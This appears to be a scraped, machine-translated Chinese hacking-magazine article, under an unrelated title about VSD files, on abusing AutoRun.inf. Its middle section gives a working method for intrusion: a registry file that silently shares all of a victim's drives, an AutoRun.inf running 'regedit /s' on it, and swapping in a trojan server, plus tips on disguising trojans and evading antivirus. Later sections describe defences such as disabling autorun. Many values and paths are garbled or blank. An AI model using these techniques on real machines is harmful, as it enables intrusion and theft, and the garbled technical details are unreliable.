打开vsd文件(VSD文件用什么软件打开)

最近网上流行共享对方所有硬盘或者通过AutoRun.inf文件中木马。由于AutoRun.inf文件在黑客技术中的应用还很少，相应的资料也不多，所以很多人对它感到很神秘。本文试图为你解开这个谜团，让你全面了解这项并不复杂却极其有趣的技术。一、理论基础经常使用光驱的朋友都知道，很多光驱放入光驱就会自动运行。他们是怎么做到的？光盘一放入光驱就会自动执行，主要依靠两个文件，一个是光盘上的AutoRun.inf文件，一个是操作系统本身的系统文件之一Cdvsd.vxd。在任何时候，vcd.vxd都会检测是否有将光盘放入光驱的动作，如果有，就会开始在光驱的根目录中寻找AutoRun.inf文件。如果AutoRun.inf文件存在，将执行其中的预设程序。AutoRun.inf不仅可以让光盘自动运行程序，还可以让硬盘自动运行程序。方法很简单。首先打开记事本，然后用鼠标右键点击文件，在弹出菜单中选择“重命名”，重命名为AutoRun.inf，在AutoRun.inf中键入以下内容:[AutoRun] //表示自动运行部分启动，必须输入Icon=C:\C.ico //才能给出个性化的盘符图标C.ico Open=C:.exe //指定要运行的程序的路径和名称。在这里，将1.exe的文件保存在c盘下，按F5刷新桌面，然后在“我的电脑”中查看盘符(这里是c盘)，你会找到它的磁盘。说明:“[AutoRun]”行是必要的固定格式，“Icon”行对应的是图标文件，“C:\C.ico”是图标文件路径和文件名。当您输入图像文件时，您可以将其更改为图像文件的路径和文件名。另外，“。ico”是图标文件的扩展名。如果你手头没有这种文件，可以用ACDSee把其他格式的软件转换成ico格式，或者找一个后缀为BMP的文件，直接重命名为ICO文件。“打开”行指定要自动运行的文件、其驱动器号和路径。特别是，如果你要更改的硬盘和目录中没有自动播放文件，你要删除“打开”行，否则你会因为找不到自动播放文件而无法打开硬盘。此时只能用鼠标右键点击盘符，在弹出菜单中选择“打开”。请注意:保存的文件名必须是“AutoRun.inf”，准备好的Autorun.inf文件和图标文件必须放在硬盘的根目录下。再者，如果你其中一个硬盘的内容是临时固定的，你不妨用Flash制作一个自动播放文件，然后编译一个“Autorun”文件，那么你就拥有了一个最酷最个性化的硬盘。它不在这里。众所周知，一些光盘放进去后，我们在它们的图标上点击鼠标右键，就会产生一个有特色的目录菜单。如果我们能在硬盘上点击鼠标右键产生同样的效果，那就更有特色了。其实光盘能有这样的效果只是因为AutoRun.inf文件中有以下两条语句:shell\ logo =显示的鼠标右键菜单中的内容shell\ logo \ command =要执行的文件或命令行。因此，要使硬盘有一个有特色的目录菜单，可以在AutoRun.inf文件中添加上述语句，如下例所示:shell \ 1 = shell \ 1 \ command \ = notepad ok . txt保存后，按F5刷新，然后用鼠标右键单击硬盘图标。在弹出的菜单中，你会发现“有情，也会老”(图1)。点击它，硬盘中的“OK.txt”文件就会自动打开。注意:上面的例子假设“ok.txt”文件在硬盘的根目录下，记事本是系统自带的记事本程序。如果要执行的文件是直接可执行程序，只需在“command”后面直接加上可执行程序的文件名即可。

图二。例子这里有一个例子:如果你扫描一台开着139共享的机器，对方只完全共享D盘，我们就要共享对方所有的盘。首先编辑注册表文件，打开记事本，并键入以下内容:

' REGEDIT4 '此处必须有空行[HKEY _ LOCAL _ MACHINE \ Software \ Microsoft \ Windows \ current version \ Network \ Lanman \ C $]" Path " = " C:\ \ " Remark " = " " " Type " = dword: " Flags " = dword: " parm lenc " = hex:" parm 2 enc " = hex:[HKEY _ LOCAL _ MACHINE \ Software \ Microsoft \ Windows \ current version \ Network \ Lanman \ D $]

以上我只设置了驱动器e，如果对方有很多逻辑驱动器号，请自行设置。将以上部分保存为Share.reg文件，以备后用。特别注意REGEDIT4是大写的，写的是大写，最后一行是空，记得最后一行按一次Enter。然后打开记事本，编译AutoRun.inf文件，并键入以下内容:

[autorun]open = regedit/sshare . reg//添加了/s参数，以便在导入过程中不显示任何信息。

保存AutoRun.inf文件。把Share.reg和AutoRun.inf两个文件都复制到对方的D盘根目录下，这样对方只要双击D盘就会把Share.reg导入注册表，这样重启后对方电脑的所有驱动器就完全共享了。如果想让对方中木马，只需改“开放=分享。Reg”到AutoRun.inf文件中的“Open=木马服务器文件名”，然后将AutoRun.inf和配置好的木马服务器复制到对方D盘的根目录下，这样对方就不需要运行木马服务器程序，只需要双击D盘就可以让木马运行了！这样做的好处很明显，就是大大增加了木马运行的主动性！需要注意的是，现在很多人都很警惕。他们不能轻易运行不熟悉的文件，这种方法防不胜防。需要注意的是，下载木马的人不会傻到不伪装木马。一般来说，他们会更改木马的服务器文件名，听起来很好听或者和系统的文件名很像。然后，他们会改变木马的图标，使它看起来像一个TXT文件，ZIP文件或图片文件等。最后，他们会修改木马的资源文件，使其不被杀毒软件识别(具体方法见本刊上一篇)。当服务器用户信以为真时，木马悄然入侵。其实换个角度理解也不难——我觉得你要是替别人下了木马，你也会这么做的。上面的手段辅以上面内容的AutoRun.inf文件，简直完美！三。防范方法共享分类完全由标志决定，其键值决定了共享目录的类型。当flags=0x302时，重启系统，目录共享标志消失。表面上看没有共享，实际上目录是完全共享的。网上流行的共享蠕虫就是利用了这个特点。如果把“flags”= dword:改成“flags”= dword:，可以看到硬盘是共享的。明白了吗？秘密就在这里！上述代码中的Parmlenc和Parm2enc属性项为加密密码，加密时系统使用8位密码分别与“359A4A653A9D46A”进行异或运算。需要先获取密码再进行异或运算，然后查ASCII表获取目录密码。网络软件里有个软件就是利用这个属性来破解网络密码的。在局域网中，从一台电脑上可以看到另一台电脑的共享密码。TCP/IP协议设计的net hackerⅱⅱ软件可以穿越Internet网络，找到共享主机，然后进行相应的操作。所以当你通过Modem上网的时候，一定要小心，因为一不小心，你的主机就完全被对方共享了。解决方法是删除HKEY _本地_机器\软件\微软\ windows \当前版本\网络\ lanman下的“C$”、“D$”和“E$”。然后删除windows\system\下的Vserver.vxd，这是一个在微软网络上共享文件和打印机的虚拟设备驱动。然后删除HKEY _本地_机器\系统\当前控制集\服务\ vxd \下的Vserver密钥，就安全了。此外，关闭硬盘的自动运行功能也是防止黑客入侵的有效方法之一。具体来说，在开始菜单的运行中输入Regedit，打开注册表编辑器，展开到HKEY _当前_用户\软件\微软\ windows \当前版本\策略\ exploder主键，在右窗格找到“NoDriveTypeAutoRun”，这是决定是执行CDROM还是硬盘的自动运行功能的键。双击“NoDriveTypeAutoRun”。在默认状态下(也就是你没有禁用AutoRun功能)，可以看到弹出窗口中“NoDriveTypeAutoRun”的默认键值是95，00，00，00，00，如图(图2)。第一个值“95”是一个十六进制值，是所有禁止自动运行的设备的总和。把“95”变成二进制是，其中每个代表一个设备。Windows中的不同设备将由以下数值表示:

图2设备名称的哪个数字用以下值表示设备名称的含义:DKIVE_UNKNOWN 0 1 01h无法识别的设备类型DRIVE_NO_ROOT_DIR 1 0 02h没有根目录的驱动器(没有根目录的驱动器)DRIVE_REMOVABLE 2 1 04h可移动驱动器_ fixed 3 0 08h固定驱动器(固定驱动器)DRIVE_REMOTE 4 1 10h网络驱动器_ cdrom 5 020h CD-r om DRIVE _ RAM Disk 6 040h RAM Disk(RAM Disk)7 1保留未指定的驱动器类型(尚未指定的驱动器值“0”表示设备正在运行，值“1”表示设备没有运行。(默认情况下，Windows禁止80h、10h、4h和01h自动运行，这些值在十六进制中加起来正好是95h，所以“NoDriveTypeAutoRun”的默认键值是95，00。从上面的分析不难看出，默认情况下，会自动运行的设备是四个保留设备:DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM和DRIVE_RAMDISK。因此，要禁止硬盘自动运行AutoRun.inf文件，必须将DRIVE_FIXED的值设置为1。这是因为DRIVE_FIXED表示固定的驱动器，也就是硬盘。这样，原来的(在表中“值”栏从下往上看)就变成了二进制的，转换成十六进制的9D。现在，将“NoDriveTypeAutoRun”的键值更改为9D，00，00，00，然后关闭注册表编辑器。重启电脑后，硬盘的自动运行功能会被关闭。如果你看懂了，那么你一定知道如何禁用光驱的自动运行功能吧！就是将DRIVE_CDROM设置为1，这样“NoDriveTypeAutoRun”键中的第一个值就变成了，也就是十六进制的B5。将第一个值更改为B5并关闭注册表编辑器。重启电脑后，会关闭CDROM的自动运行功能。如果你只想禁用软件CD的自动运行功能，但保留自动播放CD音频CD的能力，那么只需将“NoDriveTypeAutoRun”的键值改为BD，00，00，00即可。如果想恢复硬盘或光驱的自动运行功能，可以反方向进行。其实大部分硬盘根目录都不需要AutoRun.inf文件来运行程序，所以我们完全可以关闭硬盘的AutoRun功能，这样即使硬盘根目录中有AutoRun.inf文件，Windows也不会运行指定的程序，从而防止黑客利用AutoRun.inf文件入侵。另外，我们应该让Windows显示隐藏的共享。众所周知，在Windows 9X中设置共享时，可以通过在共享名后添加“$”符号来隐藏共享。例如，当我们为一台名为share的计算机的c盘设置一个共享时，我们只需要将其共享名设置为C$。这样我们就看不到共享驱动器C了，只能通过输入共享的确切路径来访问这个共享。然而，我们只需要稍微修改一下电脑里的msnp32.dll文件。您可以让Windows显示隐藏的共享。由于msnp32.dll会在Windows下调用，这个文件不能直接修改，所以第一步我们会把msnp32.dll复制到c盘，重命名为msnp32，msnp32.dll在文件夹C:\Windows\system。运行十六进制文件编辑器如UltraEdit打开msnp32，找到“24 56 E8 17”(位于偏移地址~A0)，找到后将“24”改为“00”，保存并关闭UltraEdit。重启计算机并进入DOS模式。在命令提示符下输入copy c:\ msnp32.dll c:\ Windows \ system \ msnp32.dll。重启电脑，进入Windows。现在双击共享来查看隐藏的共享。最后要提醒大家的是，TCP/IP协议设计的Nethacker等黑客软件可以穿越Internet网络，找到共享主机，然后进行相应的操作。所以当你通过Modem上网的时候，一定要小心，因为一不小心，你的主机就完全被对方共享了。防止这类事情发生的方法无非就是经常检查系统，打系统补丁，经常使用防黑客杀毒软件，上网时打开防火墙，注意异常现象，注意AutoRun.inf文件的内容，关闭共享或者不设置为完全共享，添加复杂的共享密码。声明:本文旨在让大家对网络上流行的黑客手段有一个清晰的认识，增强保护意识。所以，请不要用本文的方法去做违法的事情，并且记住:己所不欲，勿施于人！